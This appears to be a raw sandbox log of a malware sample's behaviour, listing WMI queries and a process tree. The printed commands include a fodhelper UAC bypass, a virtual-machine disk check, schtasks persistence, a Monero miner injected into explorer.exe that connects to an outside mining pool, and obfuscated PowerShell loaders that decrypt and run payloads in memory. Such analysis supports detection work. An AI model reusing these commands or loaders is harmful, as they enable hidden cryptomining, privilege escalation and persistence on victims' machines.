Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Users\user\Desktop\e7WMhx18XN.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: e7WMhx18XN.exe ReversingLabs: Detection: 52%
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Users\user\Desktop\e7WMhx18XN.exe "C:\Users\user\Desktop\e7WMhx18XN.exe"
Source: unknown Process created: C:\Windows\System32\Sgrmuserer.exe C:\Windows\system32\Sgrmuserer.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k wsappx -p -s ClipSVC
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\b.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\paint.exe "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Users\user\Desktop\e7WMhx18XN.exe Process created: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe "C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Users\user\AppData\Local\Temp\FodhelperBypassUAC.exe Process created: C:\Windows\System32\cmd.exe /c C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe C:\Windows\System32\fodhelper.exe
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\paint.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\paint.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6140 -s 1052
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" "/sihost64"
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Users\user\AppData\Local\Temp\b.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Model
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr /i /c:"WDS100T2B0A" /c:"DADY HARDDISK" /c:"QEMU HARDDISK"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c echo function elgju($CRcTF){ $KmeGB=[System.Security.Cryptography.Aes]::Create(); $KmeGB.Mode=[System.Security.Cryptography.CipherMode]::CBC; $KmeGB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $KmeGB.Key=[System.Convert]::FromBase64String('yXhq0Zci7Ki7oYmTRrbYbju3J/i3HBqGk5Zcg1aE0Uo='); $KmeGB.IV=[System.Convert]::FromBase64String('WdcPQiNwNN818it8sRh8xg=='); $TgPAd=$KmeGB.CreateDecryptor(); $dQIvJ=$TgPAd.TransformFinalBlock($CRcTF, 0, $CRcTF.Length); $TgPAd.Dispose(); $KmeGB.Dispose(); $dQIvJ;}function VIxdo($CRcTF){ Invoke-Expression '$VBZuZ=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$CRcTF);'.Replace('blck', ''); Invoke-Expression '$sdANW=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$IHCXJ=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($VBZuZ, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $IHCXJ.CopyTo($sdANW); $IHCXJ.Dispose(); $VBZuZ.Dispose(); $sdANW.Dispose(); $sdANW.ToArray();}function gYUmc($CRcTF,$tscxF){ Invoke-Expression '$jaygU=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$CRcTF);'.Replace('blck', ''); Invoke-Expression '$aZTCr=$jaygU.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$aZTCr.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $tscxF)blck;'.Replace('blck', '');}$DuTVY = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $DuTVY;$FQcuc=[System.IO.File]::ReadAllText($DuTVY).Split([Environment]::NewLine);foreach ($BcNGU in $FQcuc) { if ($BcNGU.StartsWith(':: ')) { $sDcLn=$BcNGU.Substring(3); break; }}$fKndv=[string[]]$sDcLn.Split('\');Invoke-Expression '$pcpOF=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[0])));'.Replace('blck', '');Invoke-Expression '$TAQWK=VIxdo (elgju (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($fKndv[1])));'.Replace('blck', '');gYUmc $pcpOF (,[string[]] (''));gYUmc $TAQWK (,[string[]] (''));
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:fuLUlHVbHHgj{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NnulhBqzTpRDhV,[Parameter(Position=1)][Type]$OFCpxNfkPy)$qvWXxLMOaNu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+'l'+'e'+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'l'+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'Me'+[Char](109)+'o'+[Char](114)+''+[Char](121)+''+[Char](77)+'odul'+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+'a'+[Char](116)+''+'e'+'T'+[Char](121)+''+[Char](112)+''+'e'+'','C'+[Char](108)+''+'a'+'ss'+[Char](44)+''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+'s'+[Char](115)+','+[Char](65)+''+[Char](117)+''+[Char](116)+'oC'+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$qvWXxLMOaNu.DefineConstructor(''+[Char](82)+''+[Char](84)+'S'+[Char](112)+''+[Char](101)+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'Pu'+'b'+''+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+',Ma'+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$qvWXxLMOaNu.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','P'+'u'+''+[Char](98)+'l'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+'y'+''+'S'+'i'+[Char](103)+','+[Char](78)+''+'e'+''+'w'+''+'S'+''+[Char](108)+'ot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+[Char](117)+''+'a'+'l',$OFCpxNfkPy,$NnulhBqzTpRDhV).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+'m'+[Char](101)+''+','+'M'+'a'+'n'+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $qvWXxLMOaNu.CreateType();}$iKNksxDtTNKAc=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType(''+'M'+'ic'+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+''+[Char](110)+''+'3'+''+[Char](50)+''+'.'+'U'+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:kveHNQwSSGcg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mhKVIvEXzPrIho,[Parameter(Position=1)][Type]$QOutAUbbtF)$MsesbhAsMah=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+'f'+[Char](108)+''+'e'+''+'c'+'te'+'d'+'D'+[Char](101)+'le'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+''+[Char](111)+'ry'+[Char](77)+''+[Char](111)+'dul'+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+'t'+''+'e'+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+'s,'+[Char](65)+'u'+[Char](116)+'o'+'C'+'la'+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$MsesbhAsMah.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+[Char](112)+''+'e'+'c'+'i'+''+[Char](97)+''+[Char](108)+''+[Char](78)+'ame'+[Char](44)+''+[Char](72)+''+'i'+'d'+[Char](101)+''+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+'li'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$mhKVIvEXzPrIho).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$MsesbhAsMah.DefineMethod(''+[Char](73)+'nv'+'o'+'k'+'e'+'',''+[Char](80)+''+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+'i'+'d'+'eB'+'y'+'S'+'i'+'g'+','+''+[Char](78)+''+'e'+'w'+[Char](83)+''+'l'+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+'l',$QOutAUbbtF,$mhKVIvEXzPrIho).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+','+''+[Char](77)+'ana'+[Char](103)+''+[Char](101)+'d');Write-Output $MsesbhAsMah.CreateType();}$gFfWslPcsIxEF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+'o'+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+'i'+'n'+'32.'+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+'Na'+[Char](116)+'i'+[Char](118)+''+[Char](101)+''+[Char](77)+''+'e'+''+[Char](116)+''+'h'+''+[Char](111)+''+[Char](100)+'s');$xRDavNIGnzLLon=$gFfWslPcsIxEF.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+[Char](80)+''+'r'+'o'+[Char](99)+''+'A'+''+[Cha
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
